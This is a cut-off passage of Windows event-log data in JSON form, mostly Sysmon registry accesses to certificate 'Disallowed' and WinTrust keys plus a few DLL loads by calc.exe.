"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "mlang.dll", - "image_path": "C:\\Windows\\System32\\mlang.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 